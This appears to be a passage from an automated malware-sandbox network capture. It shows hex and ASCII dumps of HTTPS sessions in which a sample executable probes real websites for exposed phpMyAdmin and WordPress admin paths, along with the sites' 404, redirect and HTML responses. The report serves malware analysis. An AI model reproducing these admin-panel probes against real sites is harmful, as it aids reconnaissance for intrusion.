                                                                                                                                                                                                    2023-11-26 05:59:43 UTC178OUTGET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                    Host: www.perrisesd.org
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC1145INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 33 30 36 37 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 33 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 0d 0a 53 65 72 76 65 72 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 49 49 53 2f 31 30 2e 30 0d 0a 53 74 72 69 63 74 2d 54 72 61 6e 73 70 6f 72 74 2d 53 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 33 31 35 33 36 30 30 30 3b 20 69 6e 63 6c 75 64 65 53 75 62 44 6f 6d 61 69 6e
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Content-Length: 3067Connection: closeDate: Sun, 26 Nov 2023 05:59:43 GMTCache-Control: privateServer: Microsoft-IIS/10.0Strict-Transport-Security: max-age=31536000; includeSubDomain
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC3067INData Raw: 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 53 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 70 65 72 72 69 73 65 73 64 2e 6f 72 67 2f 53 74 61 74 69 63 2f 2f 73 69 74 65 2f 61 73 73 65 74 73 2f 53 74 79 6c 65 73 2f 73 79 73 74 65 6d 5f 32 37 34 31 2e 63 73 73 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74
                                                                                                                                                                                                    Data Ascii: <html><head> <link rel="Stylesheet" type="text/css" href="https://www.perrisesd.org/Static//site/assets/Styles/system_2741.css" /> <title>Error 404 - Page Not Found</title> <style type="text/css"> @font-face { font


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    411192.168.2.450463104.26.7.374436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC206OUTGET /domain_profile.cfm?d=robinsonland.com HTTP/1.1
                                                                                                                                                                                                    Host: www.hugedomains.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC798INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 33 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 0d 0a 76 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 73 65 74 2d 63 6f 6f 6b 69 65 3a 20 73 69 74 65 5f 76 65 72 73 69 6f 6e 5f 70 68 61 73 65 3d 31 30 38 3b 20 65 78 70 69 72 65 73 3d 57 65 64 2c 20 32 30 2d 4e 6f 76 2d 32 30 32 34 20 30 35 3a 35 39 3a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKDate: Sun, 26 Nov 2023 05:59:43 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closecache-control: privatevary: Accept-Encodingset-cookie: site_version_phase=108; expires=Wed, 20-Nov-2024 05:59:
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC571INData Raw: 35 33 38 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 0a 3c 73 63 72 69 70 74 20 69 64 3d 22 63 6f 6f 6b 69 65 79 65 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2d 63 6f 6f 6b 69 65 79 65 73 2e 63 6f 6d 2f 63 6c 69 65 6e 74 5f 64 61 74 61 2f 65 37 31 62 63 35 33 66 31 63 62 38 38 36 36 36 64 31 36 30 63 31 65 32 2f 73 63 72 69 70 74 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 0a 3c 6d 65
                                                                                                                                                                                                    Data Ascii: 538a<!DOCTYPE html><html lang="en"><head><script id="cookieyes" type="text/javascript" src="https://cdn-cookieyes.com/client_data/e71bc53f1cb88666d160c1e2/script.js"></script><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><me
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC1369INData Raw: 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 63 73 73 2f 68 64 76 33 2d 63 73 73 2f 72 65 62 6f 6f 74 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 63 73 73 2f 68 64 76 33 2d 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 3f 61 61 3d 32 30 32 31 2d 30 36 2d 30 39 61 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 63
                                                                                                                                                                                                    Data Ascii: /><link rel="stylesheet" href="https://static.HugeDomains.com/css/hdv3-css/reboot.min.css"><link rel="stylesheet" href="https://static.HugeDomains.com/css/hdv3-css/style.css?aa=2021-06-09a"><link rel="stylesheet" href="https://static.HugeDomains.com/c
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC1369INData Raw: 6c 79 3d 4e 6f 74 6f 2b 53 61 6e 73 3a 34 30 30 2c 37 30 30 26 64 69 73 70 6c 61 79 3d 73 77 61 70 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 75 73 65 2e 74 79 70 65 6b 69 74 2e 6e 65 74 2f 7a 79 77 36 6d 64 73 2e 63 73 73 22 3e 0a 0a 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 67 74 61 67 2f 6a 73 3f 69 64 3d 55 41 2d 37 31 31 37 33 33 39 2d 34 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 3e 0d 0a 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 3d 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 7c 7c 20 5b 5d 3b 0d 0a 66 75 6e 63 74 69 6f 6e 20 67
                                                                                                                                                                                                    Data Ascii: ly=Noto+Sans:400,700&display=swap"><link rel="stylesheet" href="https://use.typekit.net/zyw6mds.css"><script async src="https://www.googletagmanager.com/gtag/js?id=UA-7117339-4"></script><script>window.dataLayer = window.dataLayer || [];function g
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC1369INData Raw: 72 63 68 2d 69 63 6f 6e 2d 77 68 69 74 65 2e 70 6e 67 22 20 74 61 62 69 6e 64 65 78 3d 22 30 22 20 61 6c 74 3d 22 48 65 61 64 65 72 20 4d 6f 62 69 6c 65 20 53 65 61 72 63 68 22 20 62 6f 72 64 65 72 3d 22 30 22 20 6f 6e 63 6c 69 63 6b 3d 22 68 65 61 64 65 72 4d 6f 62 69 6c 65 53 65 61 72 63 68 4d 61 67 46 75 6e 63 28 29 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 65 61 72 63 68 2d 62 6f 78 20 22 20 69 64 3d 22 68 64 76 33 48 65 61 64 65 72 53 65 61 72 63 68 42 6f 78 44 69 76 49 44 22 3e 0a 0a 3c 66 6f 72 6d 20 61 63 74 69 6f 6e 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 64 6f 6d 61 69 6e 5f 73 65 61 72 63 68 2e 63 66 6d 22 20 6d 65 74 68 6f
                                                                                                                                                                                                    Data Ascii: rch-icon-white.png" tabindex="0" alt="Header Mobile Search" border="0" onclick="headerMobileSearchMagFunc(); return false;"></div><div class="search-box " id="hdv3HeaderSearchBoxDivID"><form action="https://www.HugeDomains.com/domain_search.cfm" metho
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC1369INData Raw: 65 6c 20 68 69 64 65 41 74 39 39 31 57 69 64 74 68 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 68 64 76 33 2d 69 6d 67 2f 70 68 6f 6e 65 2d 69 63 6f 6e 2e 70 6e 67 22 20 61 6c 74 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 74 65 6c 6c 2d 74 65 78 74 22 3e 2b 31 2d 33 30 33 2d 38 39 33 2d 30 35 35 32 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 6e 61 76 20 63 6c 61 73 73 3d 22 6e 61 76 62 61 72 20 68 51 51 51 69 64 65 41 74 39 39 31 57 69 64 74 68 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6f 76 65 72 44 72 61 77 65 72 4c 61 79 20 22 20 6f 6e 63 6c 69 63 6b 3d 22 20 24 28 20 27 23 6e 61 76 54 6f
                                                                                                                                                                                                    Data Ascii: el hideAt991Width"><img src="https://static.HugeDomains.com/images/hdv3-img/phone-icon.png" alt><span class="tell-text">+1-303-893-0552</span></a></div></div></div><nav class="navbar hQQQideAt991Width"><div class="overDrawerLay " onclick=" $( '#navTo
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC1369INData Raw: 64 69 76 20 63 6c 61 73 73 3d 22 63 61 72 74 2d 69 63 6f 6e 22 20 73 74 79 6c 65 3d 22 70 61 64 64 69 6e 67 2d 74 6f 70 3a 30 70 78 3b 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 73 68 6f 70 70 69 6e 67 5f 63 61 72 74 2e 63 66 6d 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 20 22 20 69 64 3d 22 68 64 76 33 48 65 61 64 65 72 53 68 6f 70 70 69 6e 67 43 61 72 74 4c 69 6e 6b 49 44 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 53 68 6f 70 70 69 6e 67 20 43 61 72 74 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d 6f 62 69 6c 65 2d 73 68 6f 77 22 3e 53 68 6f 70 70 69 6e 67 20 63 61 72 74 3c 2f 73 70 61 6e 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 48
                                                                                                                                                                                                    Data Ascii: div class="cart-icon" style="padding-top:0px;"><a href="https://www.HugeDomains.com/shopping_cart.cfm" class="whiteLink " id="hdv3HeaderShoppingCartLinkID" aria-label="Shopping Cart"><span class="mobile-show">Shopping cart</span><img src="https://static.H
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC1369INData Raw: 32 37 33 70 78 3b 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 70 78 3b 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 30 70 78 3b 20 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 22 3e 50 72 6f 63 65 73 73 69 6e 67 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 75 6c 61 72 4a 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 75 6c 61 72 4a 5f 31 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 75 6c 61 72 4a 5f 32 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 75 6c 61 72 4a 5f 33 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 75 6c 61 72 4a 5f 34 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 75 6c 61 72 4a 5f 35 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69
                                                                                                                                                                                                    Data Ascii: 273px; margin-top:0px; margin-bottom:0px; display:flex;">Processing<div class="circularJ"><div class="circularJ_1"></div><div class="circularJ_2"></div><div class="circularJ_3"></div><div class="circularJ_4"></div><div class="circularJ_5"></div><di
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC1369INData Raw: 77 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 70 61 79 6d 65 6e 74 2d 70 6c 61 6e 2d 73 65 74 75 70 2e 63 66 6d 3f 64 3d 52 6f 62 69 6e 73 6f 6e 4c 61 6e 64 2e 63 6f 6d 22 20 63 6c 61 73 73 3d 22 6c 69 6e 6b 20 64 69 66 2d 6c 22 3e 53 65 65 20 64 65 74 61 69 6c 73 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 72 65 64 69 74 69 20 22 3e 0a 3c 75 6c 3e 0a 3c 6c 69 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 6d 67 22 3e 0a 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 68 64 76 33 2d 69 6d 67 2f 33 30 64 61 79 73 6d 61 6c 6c 69 63 6f 2e 70 6e 67 22 20 61 6c 74 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63
                                                                                                                                                                                                    Data Ascii: w.HugeDomains.com/payment-plan-setup.cfm?d=RobinsonLand.com" class="link dif-l">See details</a></div><div class="crediti "><ul><li><div class="img"><img src="https://static.HugeDomains.com/images/hdv3-img/30daysmallico.png" alt></div><div class="c
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC1369INData Raw: 67 6c 65 2d 70 72 6f 64 75 63 74 2d 62 6c 6f 63 6b 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6e 2d 62 6c 6f 63 6b 22 3e 0a 3c 68 31 20 69 64 3d 22 6d 61 69 6e 22 20 63 6c 61 73 73 3d 22 64 6f 6d 61 69 6e 2d 6e 61 6d 65 22 3e 52 6f 62 69 6e 73 6f 6e 4c 61 6e 64 2e 63 6f 6d 3c 2f 68 31 3e 0a 3c 70 20 63 6c 61 73 73 3d 22 64 2d 74 2d 6e 22 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 66 6f 72 20 73 61 6c 65 3a 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 72 65 65 6e 22 3e 24 32 2c 34 39 35 3c 2f 73 70 61 6e 3e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 61 62 6c 65 74 2d 62 6c 6f 63 6b 2d 73 22 3e 0a 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 63 65 6e 74 65 72 22 3e 42 75 79 20 6e 6f 77 20 66 6f 72 20 3c 73 70 61
                                                                                                                                                                                                    Data Ascii: gle-product-block"><div class="bn-block"><h1 id="main" class="domain-name">RobinsonLand.com</h1><p class="d-t-n">This domain is for sale: <span class="green">$2,495</span></p></div><div class="tablet-block-s"><p class="text-center">Buy now for <spa


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    412192.168.2.45023674.220.219.1894436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC175OUTGET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                    Host: himontessori.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC456INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 32 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 34 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 45 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 58 2d 52 65 64 69 72 65 63 74 2d 42 79 3a 20 57 6f 72 64 50 72 65 73 73 0d 0a 55 70 67 72 61 64 65 3a 20 68 32 2c 68 32 63 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 55 70 67 72 61 64 65 2c 20 63 6c 6f 73 65 0d 0a 4c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 73 3a 2f 2f
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 302 FoundDate: Sun, 26 Nov 2023 05:59:44 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0X-Redirect-By: WordPressUpgrade: h2,h2cConnection: Upgrade, closeLocation: https://


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    413192.168.2.449923194.47.252.1154436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC176OUTGET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                    Host: www.maxiv.lu.se
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC534INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 64 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 33 20 47 4d 54 0d 0a 73 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 35 37 20 28 44 65 62 69 61 6e 29 0d 0a 78 2d 70 6f 77 65 72 65 64 2d 62 79 3a 20 50 48 50 2f 38 2e 32 2e 31 32 0d 0a 65 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 6c 69 6e 6b 3a 20 3c 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 61 78 69 76 2e 6c 75 2e 73 65 2f 77 70 2d 6a 73 6f 6e 2f 3e 3b 20 72
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not Founddate: Sun, 26 Nov 2023 05:59:43 GMTserver: Apache/2.4.57 (Debian)x-powered-by: PHP/8.2.12expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0link: <https://www.maxiv.lu.se/wp-json/>; r
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC13086INData Raw: 33 33 31 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 4d 41 58 20 49 56 3c 2f 74 69 74
                                                                                                                                                                                                    Data Ascii: 3316<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found &#8211; MAX IV</tit
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC16322INData Raw: 33 46 42 41 0d 0a 73 68 65 65 74 27 20 69 64 3d 27 6a 71 75 65 72 79 2d 75 69 2d 73 74 79 6c 65 73 2d 63 73 73 27 20 68 72 65 66 3d 27 2f 2f 63 6f 64 65 2e 6a 71 75 65 72 79 2e 63 6f 6d 2f 75 69 2f 31 2e 31 33 2e 31 2f 74 68 65 6d 65 73 2f 62 61 73 65 2f 6a 71 75 65 72 79 2d 75 69 2e 63 73 73 3f 76 65 72 3d 36 2e 34 2e 31 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 74 61 62 6c 65 70 72 65 73 73 2d 64 65 66 61 75 6c 74 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 61 78 69 76 2e 6c 75 2e 73 65 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 74 61 62 6c 65 70 72 65 73 73 2f 63 73 73 2f 62 75 69 6c 64 2f 64 65 66 61 75 6c 74 2e 63
                                                                                                                                                                                                    Data Ascii: 3FBAsheet' id='jquery-ui-styles-css' href='//code.jquery.com/ui/1.13.1/themes/base/jquery-ui.css?ver=6.4.1' media='all' /><link rel='stylesheet' id='tablepress-default-css' href='https://www.maxiv.lu.se/wp-content/plugins/tablepress/css/build/default.c
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC16328INData Raw: 33 46 43 30 0d 0a 32 2e 38 34 2d 33 34 2e 35 31 20 37 32 2e 34 35 2d 31 2e 34 32 20 31 2e 34 35 2d 32 2e 38 37 20 32 2e 38 39 2d 34 2e 33 35 20 34 2e 33 34 2d 31 39 2e 36 2d 31 36 2e 34 32 2d 34 32 2e 34 31 2d 33 32 2e 33 36 2d 36 37 2e 34 38 2d 34 37 2e 31 39 7a 22 2f 3e 3c 63 69 72 63 6c 65 20 63 78 3d 22 35 30 31 22 20 63 79 3d 22 34 35 30 22 20 72 3d 22 32 35 22 2f 3e 3c 2f 67 3e 3c 2f 73 79 6d 62 6f 6c 3e 3c 73 79 6d 62 6f 6c 20 69 64 3d 22 74 77 69 74 74 65 72 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 34 20 32 34 22 3e 3c 70 61 74 68 20 64 3d 22 4d 32 33 2e 39 35 34 20 34 2e 35 36 39 61 31 30 20 31 30 20 30 20 30 20 31 2d 32 2e 38 32 35 2e 37 37 35 20 34 2e 39 35 38 20 34 2e 39 35 38 20 30 20 30 20 30 20 32 2e 31 36 33 2d 32 2e 37 32 33 63 2d
                                                                                                                                                                                                    Data Ascii: 3FC02.84-34.51 72.45-1.42 1.45-2.87 2.89-4.35 4.34-19.6-16.42-42.41-32.36-67.48-47.19z"/><circle cx="501" cy="450" r="25"/></g></symbol><symbol id="twitter" viewBox="0 0 24 24"><path d="M23.954 4.569a10 10 0 0 1-2.825.775 4.958 4.958 0 0 0 2.163-2.723c-
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC16328INData Raw: 33 46 43 30 0d 0a 6f 72 20 75 73 65 72 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 27 6d 65 6e 75 2d 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 69 74 65 6d 2d 64 65 70 74 68 2d 33 27 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 61 78 69 76 2e 6c 75 2e 73 65 2f 75 73 65 72 2d 61 63 63 65 73 73 2f 73 61 66 65 74 79 2f 69 6e 2d 63 61 73 65 2d 6f 66 2d 65 6d 65 72 67 65 6e 63 79 2f 22 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 2d 6c 61 62 65 6c 22 3e 49 6e 20 63 61 73 65 20 6f 66 20 65 6d 65 72 67 65 6e 63 79 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 27 6d 65 6e 75 2d 69 74 65 6d 20 6d
